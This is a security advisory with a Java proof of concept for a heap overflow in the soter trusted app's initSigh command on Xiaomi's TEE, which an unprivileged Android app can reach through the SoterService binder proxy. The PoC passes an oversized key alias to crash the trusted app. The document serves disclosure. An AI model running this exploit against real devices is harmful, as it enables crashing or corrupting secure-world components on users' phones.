Information

To start the signing session, soter trusted app provides the initSigh (command ID 0x100C) function, which expects to receive the business key alias and the challenge strings as arguments. The function creates a session ID by concatenating the alias and the challenge into a fixed-size buffer without checking for overflow. An attacker can provide the challenge in a size larger than 0x198 bytes or the alias larger than 0x8C bytes to overwrite the heap after the session buffer with arbitrary values. An unprivileged Android application can invoke the initSigh function by using com.tencent.soter.soterserver.SoterService as a proxy.

PoC:

import com.tencent.soter.soterserver.ISoterService;

public class MainActivity extends AppCompatActivity {
    ISoterService stub;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

        Intent it = new Intent();
        it.setClassName("com.tencent.soter.soterserver",
            "com.tencent.soter.soterserver.SoterService");
        bindService(it, connection, Context.BIND_AUTO_CREATE);
    }

    protected ServiceConnection connection = new ServiceConnection() {
        void crashTA() throws RemoteException {
            char[] keyalias = new char[0x400];
            Arrays.fill(keyalias, 'A');
            
            String challenge = "CCCCCCCCCCCCCCC";
            stub.initSigh(0, new String(keyalias), challenge);
        }

        @Override
        public void onServiceConnected(ComponentName componentName, IBinder iBinder) {
            stub = ISoterService.Stub.asInterface(iBinder);
            try {
                crashTA();
            } catch (RemoteException ex) {
            }
        }
    };
}


References:
https://trust.mi.com/misrc/bulletins/advisory?cveId=170
https://research.checkpoint.com/2022/researching-xiaomis-tee